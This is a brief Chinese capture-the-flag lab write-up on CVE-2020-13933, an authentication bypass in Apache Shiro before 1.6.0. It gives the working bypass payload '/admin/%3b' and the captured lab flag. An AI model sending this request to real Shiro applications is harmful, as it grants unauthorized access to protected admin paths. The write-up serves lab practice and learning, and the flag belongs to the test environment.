春秋云镜 CVE-2020-13933 Shiro < 1.6.0 验证绕过漏洞
靶标介绍
Apahce Shiro 由于处理身份验证请求时出错 存在 权限绕过漏洞,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。
启动场景
漏洞利用
exp
/admin/%3b
得到flag
flag{070dcf68-31cd-4da0-8573-4b1a67a0fbaf}
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!
